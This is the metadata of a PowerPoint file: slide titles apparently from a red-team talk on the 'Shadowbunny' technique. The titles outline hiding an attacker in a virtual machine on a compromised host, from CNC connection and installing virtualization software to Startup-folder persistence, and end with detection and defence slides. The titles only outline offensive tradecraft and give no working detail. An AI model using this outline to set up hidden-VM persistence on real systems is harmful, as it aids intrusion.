      <vt:lpstr>Why use virtual machines as attacker?</vt:lpstr>
      <vt:lpstr>Ragnar Locker Ransomware</vt:lpstr>
      <vt:lpstr>Examples of Red Team Operations</vt:lpstr>
      <vt:lpstr>Attack Insights Dashboard</vt:lpstr>
      <vt:lpstr>Shadowbunny Technique</vt:lpstr>
      <vt:lpstr>Shadowbunny Overview</vt:lpstr>
      <vt:lpstr>Shadowbunny Overview</vt:lpstr>
      <vt:lpstr>Pre-requisite:  Creation of a nefarious  VM Image </vt:lpstr>
      <vt:lpstr>Offline VM Image Creation</vt:lpstr>
      <vt:lpstr>Periodically connecting to CNC</vt:lpstr>
      <vt:lpstr>Distribution</vt:lpstr>
      <vt:lpstr>Compromise </vt:lpstr>
      <vt:lpstr>Assume Breach - Acquiring target host</vt:lpstr>
      <vt:lpstr>Installing/Enabling Virtualization Software</vt:lpstr>
      <vt:lpstr>Which one to choose?</vt:lpstr>
      <vt:lpstr>Downloading virtualization software</vt:lpstr>
      <vt:lpstr>VirtualBox: Installation </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Alternative: Enabling Hyper-V on Windows</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerShell Hyper-V commands</vt:lpstr>
      <vt:lpstr>Downloading  the VM Image</vt:lpstr>
      <vt:lpstr>Downloading the image file</vt:lpstr>
      <vt:lpstr>Configuration</vt:lpstr>
      <vt:lpstr>VBoxManage </vt:lpstr>
      <vt:lpstr>Configuration Settings</vt:lpstr>
      <vt:lpstr>Mounting previously downloaded vhd file</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Launching the VM</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Alternative: Using Hyper-V on Windows</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Persistence</vt:lpstr>
      <vt:lpstr>Persistence </vt:lpstr>
      <vt:lpstr>Start VM via Startup Folder (VirtualBox on Windows) </vt:lpstr>
      <vt:lpstr>Shared Folders between Guest and Host</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Detections and  Threat Hunting</vt:lpstr>
      <vt:lpstr>Detection ideas</vt:lpstr>
      <vt:lpstr>Defeating the Shadowbunny</vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Hyper-V: Persistent PowerShell Session</vt:lpstr>
      <vt:lpstr>Alternative: Using Hyper-V on Windows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2020-09-24T02:44:52Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-24T02:45:15Z</dcterms:modified>
</cp:coreProperties>
</file>